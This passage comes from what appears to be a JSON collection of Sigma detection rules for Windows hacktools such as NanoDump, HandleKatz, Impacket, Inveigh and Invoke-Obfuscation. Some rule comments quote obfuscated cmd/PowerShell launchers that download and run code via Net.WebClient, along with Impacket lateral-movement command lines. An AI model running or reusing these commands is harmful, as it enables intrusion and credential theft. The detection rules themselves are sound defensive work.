IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump\n            - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump\n            - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump\n            - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump\n            - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump\n            - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump\n            - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump\n            - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump\n            - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump\n            - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump\n            - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump\n            - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump\n            - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump\n            - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump\n            - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz\n            - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz\n            - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader\n            - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader\n            - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader\n            - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader\n            - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump\n            - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi\n            - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi\n            - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi\n            - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi\n            - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi\n            - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi\n            - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi\n            - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi\n            - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi\n            - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi\n            - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi\n            - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE\n            - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE\n            - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers\n            - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert\n            - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert\n            - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert\n            - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte\n            - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet\n            - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook\n            - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz\n            - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller\n            - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller\n            - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab\n            - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab\n            - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab\n            - IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia\n            - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast\n            - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast\n            - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast\n            - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast\n            - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast\n            - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast\n            - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast\n            - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer\n            - IMPHASH=B50199E952C875241B9CE06C971CE3C1 # EventLogCrasher\n    condition: selection\nfalsepositives:\n    - Legitimate use of one of these tools\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml",
    "content": "title: Hacktool Execution - PE Metadata\nid: 37c1333a-a0db-48be-b64b-7393b2386e3b\nstatus: test\ndescription: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed\nreferences:\n    - https://github.com/cube0x0\n    - https://www.virustotal.com/gui/search/metadata%253ACube0x0/files\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-27\nmodified: 2024-01-15\ntags:\n    - attack.credential-access\n    - attack.resource-development\n    - attack.t1588.002\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Company: 'Cube0x0' # Detects the use of tools created by a well-known hacktool producer named \"Cube0x0\", which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec, etc.)\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_gmer.yml",
    "content": "title: HackTool - GMER Rootkit Detector and Remover Execution\nid: 9082ff1f-88ab-4678-a3cc-5bcff99fc74d\nstatus: test\ndescription: Detects the execution GMER tool based on image and hash fields.\nreferences:\n    - http://www.gmer.net/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-05\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\gmer.exe'\n    selection_sysmon_hash:\n        Hashes|contains:\n            - 'MD5=E9DC058440D321AA17D0600B3CA0AB04'\n            - 'SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57'\n            - 'SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_handlekatz.yml",
    "content": "title: HackTool - HandleKatz LSASS Dumper Execution\nid: ca621ba5-54ab-4035-9942-d378e6fcde3c\nstatus: test\ndescription: Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same\nreferences:\n    - https://github.com/codewhitesec/HandleKatz\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-18\nmodified: 2024-11-23\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_loader_img:\n        Image|endswith: '\\loader.exe'\n        CommandLine|contains: '--pid:'\n    selection_loader_imphash:\n        Hashes|contains:\n            - 'IMPHASH=38D9E015591BBFD4929E0D0F47FA0055'\n            - 'IMPHASH=0E2216679CA6E1094D63322E3412D650'\n    selection_flags:\n        CommandLine|contains|all:\n            - '--pid:'\n            - '--outfile:'\n        CommandLine|contains:\n            - '.dmp'\n            - 'lsass'\n            - '.obf'\n            - 'dump'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_hashcat.yml",
    "content": "title: HackTool - Hashcat Password Cracker Execution\nid: 39b31e81-5f5f-4898-9c0e-2160cfc0f9bf\nstatus: test\ndescription: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat\n    - https://hashcat.net/wiki/doku.php?id=hashcat\nauthor: frack113\ndate: 2021-12-27\nmodified: 2023-02-04\ntags:\n    - attack.credential-access\n    - attack.t1110.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\hashcat.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '-a '\n            - '-m 1000 '\n            - '-r '\n    condition: 1 of selection_*\nfalsepositives:\n    - Tools that use similar command line flags and values\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_hollowreaper.yml",
    "content": "title: HackTool - HollowReaper Execution\nid: 85d23b42-9a9d-4f8f-b3d7-d2733c1d58f5\nstatus: experimental\ndescription: |\n    Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing.\n    It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries.\nreferences:\n    - https://github.com/vari-sh/RedTeamGrimoire/tree/b5e7635d34db6e1f0398d8847e8f293186e947c5/HollowReaper\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-01\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055.012\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\HollowReaper.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml",
    "content": "title: HackTool - Htran/NATBypass Execution\nid: f5e3b62f-e577-4e59-931e-0a15b2b94e1e\nstatus: test\ndescription: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)\nreferences:\n    - https://github.com/HiwinCN/HTran\n    - https://github.com/cw1997/NATBypass\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-12-27\nmodified: 2023-02-04\ntags:\n    - attack.command-and-control\n    - attack.t1090\n    - attack.s0040\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\htran.exe'\n            - '\\lcx.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '.exe -tran '\n            - '.exe -slave '\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_hydra.yml",
    "content": "title: HackTool - Hydra Password Bruteforce Execution\nid: aaafa146-074c-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects command line parameters used by Hydra password guessing hack tool\nreferences:\n    - https://github.com/vanhauser-thc/thc-hydra\nauthor: Vasiliy Burov\ndate: 2020-10-05\nmodified: 2023-02-04\ntags:\n    - attack.credential-access\n    - attack.t1110\n    - attack.t1110.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '-u '\n            - '-p '\n        CommandLine|contains:\n            - '^USER^'\n            - '^PASS^'\n    condition: selection\nfalsepositives:\n    - Software that uses the caret encased keywords PASS and USER in its command line\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml",
    "content": "title: HackTool - Potential Impacket Lateral Movement Activity\nid: 10c14723-61c7-4c75-92ca-9af245723ad2\nrelated:\n    - id: e31f89f7-36fb-4697-8ab6-48823708353b\n      type: obsolete\nstatus: stable\ndescription: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework\nreferences:\n    - https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py\n    - https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py\n    - https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py\n    - https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py\n    - https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html\nauthor: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch\ndate: 2019-09-03\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_other:\n        # *** wmiexec.py\n        #    parent is wmiprvse.exe\n        #    examples:\n        #       cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1567439113.54 2>&1\n        #       cmd.exe /Q /c cd  1> \\\\127.0.0.1\\ADMIN$\\__1567439113.54 2>&1\n        # *** dcomexec.py -object MMC20\n        #   parent is mmc.exe\n        #   example:\n        #       \"C:\\Windows\\System32\\cmd.exe\" /Q /c cd  1> \\\\127.0.0.1\\ADMIN$\\__1567442499.05 2>&1\n        # *** dcomexec.py -object ShellBrowserWindow\n        #  runs %SystemRoot%\\System32\\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe\n        #  example:\n        #   \"C:\\Windows\\System32\\cmd.exe\" /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1567520103.71 2>&1\n        # *** smbexec.py\n        #   parent is services.exe\n        #   example:\n        #       C:\\Windows\\system32\\cmd.exe /Q /c echo tasklist ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > C:\\Windows\\TEMP\\execute.bat & C:\\Windows\\system32\\cmd.exe /Q /c C:\\Windows\\TEMP\\execute.bat & del C:\\Windows\\TEMP\\execute.bat\n        ParentImage|endswith:\n            - '\\wmiprvse.exe'        # wmiexec\n            - '\\mmc.exe'        # dcomexec MMC\n            - '\\explorer.exe'        # dcomexec ShellBrowserWindow\n            - '\\services.exe'        # smbexec\n        CommandLine|contains|all:\n            - 'cmd.exe'\n            - '/Q'\n            - '/c'\n            - '\\\\\\\\127.0.0.1\\\\'\n            - '&1'\n    selection_atexec:\n        ParentCommandLine|contains:\n            - 'svchost.exe -k netsvcs'       # atexec on win10 (parent is \"C:\\Windows\\system32\\svchost.exe -k netsvcs\")\n            - 'taskeng.exe'       # atexec on win7 (parent is \"taskeng.exe {AFA79333-694C-4BEE-910E-E57D9A3518F6} S-1-5-18:NT AUTHORITY\\System:Service:\")\n            # cmd.exe /C tasklist /m > C:\\Windows\\Temp\\bAJrYQtL.tmp 2>&1\n        CommandLine|contains|all:\n            - 'cmd.exe'\n            - '/C'\n            - 'Windows\\Temp\\'\n            - '&1'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_impacket_tools.yml",
    "content": "title: HackTool - Impacket Tools Execution\nid: 4627c6ae-6899-46e2-aa0c-6ebcb1becd19\nstatus: test\ndescription: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)\nreferences:\n    - https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-24\nmodified: 2023-02-07\ntags:\n    - attack.collection\n    - attack.execution\n    - attack.credential-access\n    - attack.t1557.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|contains:\n              - '\\goldenPac'\n              - '\\karmaSMB'\n              - '\\kintercept'\n              - '\\ntlmrelayx'\n              - '\\rpcdump'\n              - '\\samrdump'\n              - '\\secretsdump'\n              - '\\smbexec'\n              - '\\smbrelayx'\n              - '\\wmiexec'\n              - '\\wmipersist'\n        - Image|endswith:\n              - '\\atexec_windows.exe'\n              - '\\dcomexec_windows.exe'\n              - '\\dpapi_windows.exe'\n              - '\\findDelegation_windows.exe'\n              - '\\GetADUsers_windows.exe'\n              - '\\GetNPUsers_windows.exe'\n              - '\\getPac_windows.exe'\n              - '\\getST_windows.exe'\n              - '\\getTGT_windows.exe'\n              - '\\GetUserSPNs_windows.exe'\n              - '\\ifmap_windows.exe'\n              - '\\mimikatz_windows.exe'\n              - '\\netview_windows.exe'\n              - '\\nmapAnswerMachine_windows.exe'\n              - '\\opdump_windows.exe'\n              - '\\psexec_windows.exe'\n              - '\\rdp_check_windows.exe'\n              - '\\sambaPipe_windows.exe'\n              - '\\smbclient_windows.exe'\n              - '\\smbserver_windows.exe'\n              - '\\sniff_windows.exe'\n              - '\\sniffer_windows.exe'\n              - '\\split_windows.exe'\n              - '\\ticketer_windows.exe'\n              # - '\\addcomputer_windows.exe'\n              # - '\\esentutl_windows.exe'\n              # - '\\getArch_windows.exe'\n              # - '\\lookupsid_windows.exe'\n              # - '\\mqtt_check_windows.exe'\n              # - '\\mssqlclient_windows.exe'\n              # - '\\mssqlinstance_windows.exe'\n              # - '\\ntfs-read_windows.exe'\n              # - '\\ping_windows.exe'\n              # - '\\ping6_windows.exe'\n              # - '\\raiseChild_windows.exe'\n              # - '\\reg_windows.exe'\n              # - '\\registry-read_windows.exe'\n              # - '\\services_windows.exe'\n              # - '\\wmiquery_windows.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the impacket tools\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_impersonate.yml",
    "content": "title: HackTool - Impersonate Execution\nid: cf0c254b-22f1-4b2b-8221-e137b3c0af94\nstatus: test\ndescription: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively\nreferences:\n    - https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/\n    - https://github.com/sensepost/impersonate\nauthor: Sai Prashanth Pulisetti @pulisettis\ndate: 2022-12-21\nmodified: 2024-11-23\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1134.001\n    - attack.t1134.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_commandline_exe:\n        CommandLine|contains: 'impersonate.exe'\n    selection_commandline_opt:\n        CommandLine|contains:\n            - ' list '\n            - ' exec '\n            - ' adduser '\n    selection_hash:\n        Hashes|contains:\n            - 'MD5=9520714AB576B0ED01D1513691377D01'\n            - 'SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A'\n            - 'IMPHASH=0A358FFC1697B7A07D0E817AC740DF62'\n    condition: all of selection_commandline_* or selection_hash\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_inveigh.yml",
    "content": "title: HackTool - Inveigh Execution\nid: b99a1518-1ad5-4f65-bc95-1ffff97a8fd0\nstatus: test\ndescription: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool\nreferences:\n    - https://github.com/Kevin-Robertson/Inveigh\n    - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-24\nmodified: 2023-02-04\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Inveigh.exe'\n        - OriginalFileName:\n              - '\\Inveigh.exe'\n              - '\\Inveigh.dll'\n        - Description: 'Inveigh'\n        - CommandLine|contains:\n              - ' -SpooferIP'\n              - ' -ReplyToIPs '\n              - ' -ReplyToDomains '\n              - ' -ReplyToMACs '\n              - ' -SnifferIP'\n    condition: selection\nfalsepositives:\n    - Very unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml",
    "content": "title: Invoke-Obfuscation CLIP+ Launcher\nid: b222df08-0e07-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of Clip.exe to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 26)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-13\nmodified: 2022-11-17\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # CommandLine|re: 'cmd.{0,5}(?:\\/c|\\/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\\\"\\{\\d\\}.+\\-f.+\\\"'\n        # Example 1: Cmd /c\" echo/Invoke-Expression (New-Object Net.WebClient).DownloadString |cLiP&& POWerSheLl -Nolog -sT . (\\\"{1}{2}{0}\\\"-f'pe','Ad',(\\\"{1}{0}\\\" -f'Ty','d-' ) ) -Assemb ( \\\"{5}{1}{3}{0}{2}{4}\\\" -f'ows','y','.F',(\\\"{0}{1}{2}\\\" -f'stem.W','i','nd'),( \\\"{0}{1}\\\"-f 'o','rms' ),'S' ) ; ([SySTEM.wiNDows.FoRmS.CLiPbOArd]::( \\\"{1}{0}\\\" -f (\\\"{1}{0}\\\" -f'T','TTeX' ),'gE' ).\\\"invO`Ke\\\"( ) ) ^| ^&( \\\"{5}{1}{2}{4}{3}{0}\\\" -f 'n',( \\\"{1}{0}\\\"-f'KE-','o' ),(\\\"{2}{1}{0}\\\"-f 'pRESS','x','e' ),'o','i','iNV') ; [System.Windows.Forms.Clipboard]::(\\\"{0}{1}\\\" -f( \\\"{1}{0}\\\"-f'e','SetT' ),'xt').\\\"InV`oKe\\\"( ' ')\"\n        # Example 2: CMD/c \" ECho Invoke-Expression (New-Object Net.WebClient).DownloadString|c:\\WiNDowS\\SySteM32\\cLip && powershElL -noPRO -sTa ^& (\\\"{2}{0}{1}\\\" -f 'dd',(\\\"{1}{0}\\\"-f 'ype','-T' ),'A' ) -AssemblyN (\\\"{0}{3}{2}{1}{4}\\\"-f'Pr','nCo',(\\\"{0}{1}\\\"-f'e','ntatio'),'es','re' ) ; ^& ( ( [StRinG]${ve`RB`OSE`pr`e`FeReNCE} )[1,3] + 'x'-JoiN'') ( ( [sySTem.WInDOWs.ClipbOaRD]::( \\\"{1}{0}\\\" -f(\\\"{0}{1}\\\" -f'tTe','xt' ),'ge' ).\\\"IN`Vo`Ke\\\"( ) ) ) ; [System.Windows.Clipboard]::( \\\"{2}{1}{0}\\\" -f't',( \\\"{0}{1}\\\" -f 'tT','ex' ),'Se' ).\\\"In`V`oKe\\\"( ' ' )\"\n        CommandLine|contains|all:\n            - 'cmd'\n            - '&&'\n            - 'clipboard]::'\n            - '-f'\n        CommandLine|contains:\n            - '/c'\n            - '/r'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml",
    "content": "title: Invoke-Obfuscation Obfuscated IEX Invocation\nid: 4bf943c6-5146-4273-98dd-e958fd1e3abf\nstatus: test\ndescription: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nauthor: 'Daniel Bohannon (@Mandiant/@FireEye), oscd.community'\ndate: 2019-11-08\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|re: '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\['\n        - CommandLine|re: '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\['\n        - CommandLine|re: '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\['\n        - CommandLine|re: '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}'\n        - CommandLine|re: '\\*mdr\\*\\W\\s*\\)\\.Name'\n        - CommandLine|re: '\\$VerbosePreference\\.ToString\\('\n        - CommandLine|re: '\\[String\\]\\s*\\$VerbosePreference'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml",
    "content": "title: Invoke-Obfuscation STDIN+ Launcher\nid: 6c96fc76-0eb1-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of stdin to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 25)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2024-04-15\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Example 1: c:\\windows\\sYstEm32\\CmD.eXE /C\"echO\\Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -NoEXiT -\"\n        # Example 2: c:\\WiNDOws\\sysTEm32\\cmd.EXe /C \" ECHo Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -nol ${EXEcUtIONCONTeXT}.INvOkEComMANd.InvOKEScRIPt( $InpUt )\"\n        CommandLine|re: 'cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml",
    "content": "title: Invoke-Obfuscation VAR+ Launcher\nid: 27aec9c9-dbb0-4939-8422-1742242471d0\nstatus: test\ndescription: Detects Obfuscated use of Environment Variables to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 24)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2024-04-15\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Example 1: C:\\winDoWs\\SySTeM32\\cmd.Exe /C\"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\\\"{2}{3}{0}{1}\\\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\\\"IN`VO`KecOmMaND\\\".\\\"inVo`KES`crIPt\\\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\\\"{1}{4}{2}{3}{0}\\\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \\\"{0}{1}\\\"-f'n','oti' ),( \\\"{0}{1}\\\" -f'pRoC','esS') )) )\"\n        # Example 2: cMD.exe /C \"seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\\\"{1}{0}{2}{3}\\\" -f 'eT-vaR','G','iab','lE' ) (\\\"{0}{1}\\\" -f '*m','DR*' ) ).\\\"na`ME\\\"[3,11,2]-JOIN'' ) ( ( ^&(\\\"{0}{1}\\\" -f'g','CI' ) (\\\"{0}{1}\\\" -f 'ENV',':SlDb' ) ).\\\"VA`luE\\\" ) \"\n        CommandLine|re: 'cmd.{0,5}(?:/c|/r)(?:\\s|)\\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml",
    "content": "title: Invoke-Obfuscation COMPRESS OBFUSCATION\nid: 7eedcc9d-9fdb-4d94-9c54-474e8affc0c7\nstatus: test\ndescription: Detects Obfuscated Powershell via COMPRESS OBFUSCATION\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-12-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'new-object'\n            - 'text.encoding]::ascii'\n        CommandLine|contains:\n            - 'system.io.compression.deflatestream'\n            - 'system.io.streamreader'\n            - 'readtoend('\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml",
    "content": "title: Invoke-Obfuscation Via Stdin\nid: 9c14c9fa-1a63-4a64-8e57-d19280559490\nstatus: test\ndescription: Detects Obfuscated Powershell via Stdin in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-12\nmodified: 2024-04-16\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|re: '(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml",
